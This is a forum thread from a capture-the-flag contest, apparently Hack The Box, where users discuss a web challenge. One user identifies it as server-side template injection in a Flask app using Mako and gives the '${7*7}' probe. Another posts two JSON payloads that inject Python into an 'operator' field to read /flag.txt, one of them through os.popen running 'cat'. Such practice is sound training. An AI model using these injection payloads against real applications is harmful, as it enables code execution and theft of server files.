Return to forum

karhu · October 23, 2022 at 3:34 PM

Finished Day 2 Web ;)

tryingNew1 · October 23, 2022 at 3:38 PM

(October 23, 2022, 03:34 PM)karhu Wrote: Finished Day 2 Web ;)

whats the payload seems its rce through url

00hades · October 23, 2022 at 3:50 PM

[quote pid="694154" dateline="1666450570"]

Currently working on the Crypto Challenge...
[/quote]

karhu · October 23, 2022 at 4:02 PM

(October 23, 2022, 03:38 PM)tryingNew1 Wrote:
(October 23, 2022, 03:34 PM)karhu Wrote: Finished Day 2 Web ;)

whats the payload seems its rce through url

It's SSTI against MakoTemplates from Flask.

${7*7} works.

Meep · October 23, 2022 at 4:07 PM

Thanks

zakuworld · October 23, 2022 at 4:30 PM

i have had so much trouble with these also its my first try on a CTF

thisijustinsane · October 23, 2022 at 4:34 PM

damn thanks mate

Stofii · October 23, 2022 at 4:48 PM

thanks

tsartsa · October 23, 2022 at 5:20 PM

thanks

o2n · October 23, 2022 at 5:51 PM

{"current_health":"100","attack_power":"100","operator":"+ 1; result=open('/flag.txt', 'r').readline()#"}

{"current_health":"100","attack_power":"100","operator":"; result=__import__('os').popen('cat /flag.txt').read();"}

Tried both in burp for web challenge, still the request is "HTB{f4k3_fl4g_f0r_t3st1ng}"